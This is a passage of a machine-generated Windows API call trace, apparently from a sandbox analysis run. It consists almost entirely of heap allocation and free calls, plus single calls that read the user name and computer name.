hHeap=0x1780000) returned 1 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0149.958] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0149.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0149.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0149.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0149.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0149.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0149.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0149.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabb0 [0149.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac10 [0149.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac58 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadc0 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf58 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafe8 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb030 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a1e80 [0149.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb078 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb048 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf70 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafb8 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf88 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafd0 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf10 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafa0 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4a58 [0149.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a1e80 | out: hHeap=0x1780000) returned 1 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb000 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caec8 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadf0 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0149.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad90 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadd8 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae08 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae20 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae68 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae98 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb2d0 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb0c0 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb300 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb0f0 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb348 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb330 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb0d8 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100) returned 0x4181178 [0149.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4a58 | out: hHeap=0x1780000) returned 1 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb228 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb168 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb2e8 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb0a8 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb120 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb150 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0149.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0149.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x499e588 [0149.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0149.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0149.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392e30 [0149.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0149.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0149.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x43f90d8 [0149.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392e30 | out: hHeap=0x1780000) returned 1 [0149.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0149.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9bf0 [0149.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0149.961] GetUserNameW (in: lpBuffer=0x144ef98, pcbBuffer=0x144f2b4 | out: lpBuffer="FD1HVy", pcbBuffer=0x144f2b4) returned 1 [0149.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0149.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0149.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0149.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0149.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0149.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0149.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0149.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0149.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea490 [0149.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0149.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0149.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0149.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0149.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0149.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0149.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0149.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0149.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0149.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0149.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0149.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea490 [0149.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0149.963] GetComputerNameW (in: lpBuffer=0x144ef98, nSize=0x144f2b4 | out: lpBuffer="NQDPDE", nSize=0x144f2b4) returned 1 [0149.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0149.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0149.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0149.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0149.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0149.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0149.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0149.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9bf0 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0149.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0149.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0149.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0149.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0149.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0149.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0149.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0149.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x140) returned 0x43f3c90 [0149.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43f90d8 | out: hHeap=0x1780000) returned 1 [0149.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0149.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0149.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea268 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0149.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0149.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0149.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0149.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9bf0 [0149.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0149.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0149.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0149.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0149.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea268 [0149.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0149.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0149.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0149.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0149.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0149.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0149.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0149.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0149.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0149.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0149.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0149.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0149.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0149.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0149.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0149.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0149.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0149.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0149.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0149.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0149.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0149.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0149.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0149.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0149.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0149.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0149.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0149.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499e588 | out: hHeap=0x1780000) returned 1 [0149.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0149.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0149.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0149.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0149.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0149.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0149.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0149.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0149.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0149.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0149.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0149.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0149.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0149.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 